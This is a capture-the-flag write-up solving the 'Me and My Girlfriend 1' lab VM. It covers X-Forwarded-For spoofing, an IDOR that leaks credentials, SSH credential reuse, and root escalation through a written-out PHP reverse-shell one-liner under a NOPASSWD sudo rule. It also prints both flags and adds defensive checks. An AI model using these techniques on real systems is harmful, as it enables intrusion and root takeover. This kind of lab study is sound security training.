Lab Solution: Me and My Girlfriend 1

January 5, 2020

Machine Link:,409/#

Machine Author: TW1C3 (@makegreatagain_)

Description (as given by the machine author):

This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, “Ceban Corp”, something has changed from Alice’s attitude towards Bob like something is “hidden”, And Bob asks for your help to get what Alice is hiding and get full access to the company!

Level: Beginner

# of Flags: 2

Machine Published Date: 13-Dec-2019

The Solution:

It had been a while since I had got my hands dirty on any lab machines. While browsing, I came across this interesting machine and decided to solve it. I took the following steps to capture both flags.

Since I knew the MAC address of the machine (00:0C:29:97:56:3F) and the IP range of the NAT interface, I ran the Nmap scan below to obtain the IP address of the machine and its open ports.

nmap -sS -p 21,22,23,80,443
MAC Address of the VM
MAC Address of the Virtual Machine
Nmap Scan output – IP address of the VM and open ports

From the Nmap output I obtained the IP address assigned to the virtual machine and saw that ports TCP/22 and TCP/80 were open. This implies that the server was hosting a web application and that SSH was being used for remote administration of the machine.

Now we open the application in the browser and encounter an interesting message on the webpage that says “Who are you? Hacker? Sorry This Site Can Only Be Accessed local!”

Application error message

To dig further into this, I intercepted the request and response in Burp and found another interesting comment appended after that message in the HTML source. The comment said “<!-- Maybe you can search how to use x-forwarded-for -->”.

Default Request for the application
The default response of the application containing the comment for the hint

Now I added an X-Forwarded-For: header to each of my requests, and the application started working.

Added X-Forwarded-For: in each request
Application working – We are now on the home page of the application
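As an added illustration from the defending side (not code from the write-up or from the lab itself), the check below shows why a “local only” rule that reads X-Forwarded-For can be satisfied by any remote client, and how to evaluate the header only when it was set by your own proxy. The proxy address and function names are assumptions.

```python
import ipaddress

# Assumed address of the site's own reverse proxy; only it may set the header.
TRUSTED_PROXIES = {"10.0.0.2"}

def client_ip_vulnerable(remote_addr, headers):
    """Mimics the lab's check: the header is trusted whenever present,
    so any remote client can claim to be local simply by sending it."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else remote_addr

def client_ip_hardened(remote_addr, headers):
    """Honour X-Forwarded-For only when the TCP peer is a trusted proxy,
    and then take the right-most address that is not one of our proxies:
    everything to the left of it was supplied by the client."""
    if remote_addr not in TRUSTED_PROXIES:
        return remote_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")]
    for hop in reversed(hops):
        if hop and hop not in TRUSTED_PROXIES:
            return hop
    return remote_addr

def is_local(ip):
    try:
        return ipaddress.ip_address(ip).is_loopback
    except ValueError:
        return False  # a malformed header value never counts as local

def allowed(remote_addr, headers, resolver):
    """Access decision for the 'local only' site using the given resolver."""
    return is_local(resolver(remote_addr, headers))

if __name__ == "__main__":
    # Constructed request: an external client sending the header directly.
    spoofed = {"X-Forwarded-For": "127.0.0.1"}
    print(allowed("203.0.113.7", spoofed, client_ip_vulnerable))  # True
    print(allowed("203.0.113.7", spoofed, client_ip_hardened))    # False
```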

Now we see a registration option on the application. This is the easiest way to gain access to it. I registered myself on the application and proceeded to log in.

Registration Form
Login Page
Successful Login – Post Login Page Response

After successful login, there were three available options: Dashboard (the current page), Profile, and Logout. So my next probable choice was the Profile section. On the profile page, the URL had a parameter user_id with a value of 12. I sent the request to Intruder in Burp, passed sequential values from 1 to 15 as the payload, and observed that different values of user_id returned information about other users, including their clear-text credentials.

User_id parameter had a value of 12. Send the request to Intruder.
Intruder Payload Position – user_id parameter
Intruder Payload Configuration
Intruder payload value 5 – Request
User ID corresponds to Alice’s profile which reveals her credentials.

Analyzing the responses in Intruder, I observed that user_id 5 corresponds to Alice’s profile. Alice’s credentials were the username ‘alice’ and the password ‘4lic3’.

Assuming Alice used the same credentials for all her logins, I tried my luck on the SSH port that was open on the server. The credentials worked, and now I had access to the server. Looking through Alice’s directories, especially the hidden ones, I ran the ls -a command and made another interesting find: a directory named ‘.my_secret’ was present in Alice’s home folder. Navigating to the directory and listing the files, I found two files, my_notes.txt and flag1.txt.

SSH access on the virtual machine

Using the cat command, I read both files and found the first flag and a hint for the next one.

Flag 1: gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
Flag 1 captured

Now, to gain root-level access, I first ran sudo su - as the basic option, but it didn’t work. Then I checked what sudo permissions Alice had and found that she has a NOPASSWD entry allowing her to run PHP as root.

Alice can run PHP as root
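A small audit for exactly this class of sudoers rule, added here as an illustration and not part of the original write-up: it flags NOPASSWD rules that let a user run a shell-capable interpreter (or ALL) as root. The sudoers text is a constructed sample, the parser handles only the simple user-spec form, and the interpreter list is a starting point rather than a complete one.

```python
import re

# Programs that run arbitrary code once started as root, so a sudo rule
# for them is effectively a rule for root. Starting point, not exhaustive.
SHELL_CAPABLE = {"php", "python", "python3", "perl", "ruby", "bash", "sh"}

# user  host=(runas) TAG: cmd, cmd ...   (simplified sudoers user spec)
RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

def audit_sudoers(text):
    """Return (user, command) pairs for rules that grant password-less
    root execution of a shell-capable program or of ALL."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        runas = (m.group("runas") or "root").split(":")[0].strip()
        nopasswd = "NOPASSWD:" in m.group("tags").replace(" ", "")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            prog = cmd.split()[0].rsplit("/", 1)[-1]
            risky = cmd == "ALL" or prog in SHELL_CAPABLE
            if nopasswd and risky and runas in ("root", "ALL"):
                findings.append((m.group("who"), cmd))
    return findings

# Constructed sample; the third rule is the shape Alice's entry had.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
alice   ALL=(root) NOPASSWD: /usr/bin/php
bob     ALL=(root) /usr/bin/apt-get
carol   ALL=(www-data) NOPASSWD: /usr/bin/php
"""

if __name__ == "__main__":
    print(audit_sudoers(SAMPLE_SUDOERS))  # [('alice', '/usr/bin/php')]
```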

To exploit this misconfiguration, I started a Netcat listener on my system on port 1234 and ran the following command from Alice’s session. I got a reverse root shell on my Netcat listener.

sudo php -r '$sock=fsockopen("", 1234); exec("/bin/sh -i <&3 >&3 2>&3");'
Reverse Shell on Attacker’s machine with root-level access

Navigating to the /root directory and listing all the files, I found only one file, flag2.txt. Using the cat command, I read flag2.txt and captured the second and final flag.

Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
Flag 2 captured.

I hope you liked the blog and that it helps while you solve this machine. The new learning for me in this machine was using PHP to get a reverse shell connection. I had learnt this technique earlier but never had a chance to use it.

Lastly, I would like to thank the author of this machine for the dedication and effort he put into creating it. Cheers TW1C3!!!